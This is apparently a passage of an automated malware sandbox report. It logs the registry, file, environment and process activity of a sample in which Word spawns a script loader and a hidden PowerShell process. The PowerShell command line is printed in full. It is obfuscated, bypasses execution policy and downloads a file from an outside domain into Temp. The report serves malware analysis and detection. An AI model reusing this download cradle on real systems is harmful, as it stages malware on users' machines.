Get Info PowErshelL.eXe type = file_attributes False 1
Fn
Open STD_OUTPUT_HANDLE - True 3
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_ERROR_HANDLE - True 3
Fn
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 24, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe os_pid = 0x964, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\system32\cmd.exe base_address = 0x4ac50000 True 1
Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x77040000 True 2
Fn
Get Filename - process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x77056d40 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CopyFileExW, address_out = 0x770523d0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x77048290 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x770517e0 True 1
Fn
System (3)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-07-26 16:45:57 (UTC) True 1
Fn
Get Time type = Ticks, time = 125549 True 1
Fn
Get Time type = Performance Ctr, time = 17955408596 True 1
Fn
Environment (19)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 5
Fn
Data
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client True 3
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 3
Fn
Get Environment String name = PROMPT False 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Get Environment String name = temp, result_out = C:\Users\aETAdzjz\AppData\Local\Temp True 2
Fn
Set Environment String name = PROMPT, value = $P$G True 1
Fn
Set Environment String name = =C:, value = C:\Users\aETAdzjz\Documents True 1
Fn
Set Environment String name = COPYCMD True 1
Fn
Process #11: powershell.exe
340 0
»
Information Value
ID #11
File Name c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\aETAdzjz\AppData\Local\TempxeE84.png');
Initial Working Directory C:\Users\aETAdzjz\Documents\
Monitor Start Time: 00:00:55, Reason: Child Process
Unmonitor End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration 00:03:30
OS Process Information
»
Information Value
PID 0x964
Parent PID 0x838 (c:\windows\system32\cmd.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 968
0x 9DC
0x 708
0x 9E8
0x 24C
0x 76C
0x 484
Host Behavior
File (38)
»
Operation Filename Additional Information Success Count Logfile
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz type = file_attributes True 3
Fn
Get Info C:\ type = file_attributes True 6
Fn
Get Info C:\Users\aETAdzjz\Documents type = file_attributes True 5
Fn
Get Info C:\Users type = file_attributes True 2
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 4096 True 3
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 3315 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 781, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 0 True 1
Fn
Read - size = 4096, size_out = 4096 True 5
Fn
Data
Read - size = 4096, size_out = 2530 True 1
Fn
Data
Read - size = 542, size_out = 0 True 1
Fn
Read - size = 4096, size_out = 0 True 1
Fn
Registry (146)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment - True 1
Fn
Open Key HKEY_CURRENT_USER\Environment - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Environment value_name = PSMODULEPATH, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Module (1)
»
Operation Module Additional Information Success Count Logfile
Get Filename - process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 True 1
Fn
User (10)
»
Operation Additional Information Success Count Logfile
Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
Fn
Get Username user_name_out = aETAdzjz True 9
Fn
System (6)
»
Operation Additional Information Success Count Logfile
Get Info type = Operating System True 4
Fn
Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Get Info type = Hardware Information True 1
Fn
Environment (67)
»
Operation Additional Information Success Count Logfile
Get Environment String name = MshEnableTrace False 61
Fn
Get Environment String name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ True 1
Fn
Get Environment String name = HOMEDRIVE, result_out = C: True 1
Fn
Get Environment String name = HOMEPATH, result_out = \Users\aETAdzjz True 1
Fn
Get Environment String name = HomeDrive, result_out = C: True 1
Fn
Get Environment String name = HomePath, result_out = \Users\aETAdzjz True 1
Fn
Set Environment String name = PSExecutionPolicyPreference, value = Bypass True 1
Fn
Process #12: wscript.exe
136 0
»
Information Value
ID #12
File Name c:\windows\system32\wscript.exe
Command Line "C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js"
Initial Working Directory C:\Users\aETAdzjz\Documents\
Monitor Start Time: 00:00:57, Reason: Child Process
Unmonitor End Time: 00:01:01, Reason: Self Terminated
Monitor Duration 00:00:03
OS Process Information
»
Information Value
PID 0x178
Parent PID 0x910 (c:\program files\microsoft office\root\office16\winword.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x A1C
0x 878
0x 57C
0x 4FC
0x 3C4
0x 568
0x 5FC
0x 358
0x 768
0x 610
Host Behavior
COM (2)
»
Operation Class Interface Additional Information Success Count Logfile
Create F414C260-6AC0-11CF-B6D1-00AA00BBBB58 00000000-0000-0000-C000-000000000046 cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER False 1
Fn
Create 06290BD1-48AA-11D2-8432-006008C3FBFC E4D1C9B0-46E8-11D4-A2A6-00104BD35090 cls_context = CLSCTX_INPROC_SERVER True 1
Fn
File (2)
»
Operation Filename Additional Information Success Count Logfile
Get Info - type = size True 1
Fn
Read - size = 19304, size_out = 19304 True 1
Fn
Data
Registry (28)
»
Operation Key Additional Information Success Count Logfile
Create Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Create Key HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Open Key HKEY_CLASSES_ROOT\.js - True 1
Fn
Open Key HKEY_CLASSES_ROOT\JSFile\ScriptEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features - False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = IgnoreUserSettings, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = Enabled, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = Enabled, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = IgnoreUserSettings, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = LogSecuritySuccesses, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = LogSecuritySuccesses, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = IgnoreUserSettings, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = TrustPolicy, data = 128, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = UseWINSAFER, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = TrustPolicy, data = 128, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = UseWINSAFER, data = 1, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = Timeout, data = 128, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = DisplayLogo, data = 1, type = REG_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = Timeout, data = 128, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = DisplayLogo, data = 49, type = REG_NONE False 1
Fn
Read Value HKEY_CLASSES_ROOT\.js data = JSFile, type = REG_SZ True 1
Fn
Read Value HKEY_CLASSES_ROOT\JSFile\ScriptEngine data = JScript, type = REG_SZ True 1
Fn
Module (9)
»
Operation Module Additional Information Success Count Logfile
Load kernel32.dll base_address = 0x77040000 True 1
Fn
Load ADVAPI32.dll base_address = 0x7fefd710000 True 1
Fn
Get Handle c:\windows\system32\wscript.exe base_address = 0xff430000 True 2
Fn
Get Filename c:\windows\system32\wscript.exe process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 261 True 1
Fn
Get Filename - process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = HeapSetInformation, address_out = 0x7705c4a0 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegisterTraceGuidsA, address_out = 0x7717f570 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegOpenKeyExA, address_out = 0x7fefd72b5f0 True 1
Fn
Window (1)
»
Operation Window Name Additional Information Success Count Logfile
Create - class_name = WSH-Timer, wndproc_parameter = 6707808 True 1
Fn
System (63)
»
Operation Additional Information Success Count Logfile
Sleep duration = -1 (infinite) True 2
Fn
Get Time type = System Time, time = 2019-07-26 16:46:00 (UTC) True 1
Fn
Get Time type = Ticks, time = 128326 True 1
Fn
Get Time type = Performance Ctr, time = 18234896961 True 1
Fn
Get Time type = System Time, time = 2019-07-26 16:46:01 (UTC) True 3
Fn
Get Time type = Ticks, time = 128763 True 1
Fn
